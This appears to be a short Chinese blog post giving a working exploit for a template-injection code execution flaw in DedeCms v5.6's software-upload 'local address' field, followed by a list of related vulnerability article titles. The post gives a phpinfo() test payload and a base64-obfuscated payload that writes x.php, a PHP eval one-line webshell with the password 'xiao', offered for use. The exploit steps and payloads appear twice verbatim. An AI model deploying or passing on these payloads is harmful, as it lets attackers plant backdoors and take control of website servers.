DedeCms v5.6 嵌入恶意代码执行漏洞
2011-04-25 14:23
751 查看
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57
name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57
name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php
密码:xiao直接生成一句话。密码xiao 大家懂得
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57
name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57
name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php
密码:xiao直接生成一句话。密码xiao 大家懂得
相关文章推荐
- VMware Mac版本漏洞可任意执行恶意代码
- PHP惊现安全漏洞 易执行恶意代码和DoS攻击
- 游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
- Android漏洞——将Android恶意代码隐藏在图片中
- phpcms前台任意代码执行漏洞(php<5.3)
- 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
- 海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
- 友情检测--tomcat管理程序认证上传及代码执行漏洞
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- Struts2 S2 – 032远程代码执行漏洞分析报告
- PHP代码执行漏洞
- nginx NULL-Byte 任意代码执行漏洞
- Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
- Apache SpamAssassin 任意代码执行漏洞(CVE-2018-11781)
- OrientDB远程代码执行漏洞利用与分析
- CVE-2018-18319 - 华硕路由器 Merlin.php 代码执行漏洞
- 安全预警 | 知名 Web 应用服务器 Tomcat 信息泄漏和远程代码执行漏洞
- WordPress 3.5.1远程代码执行漏洞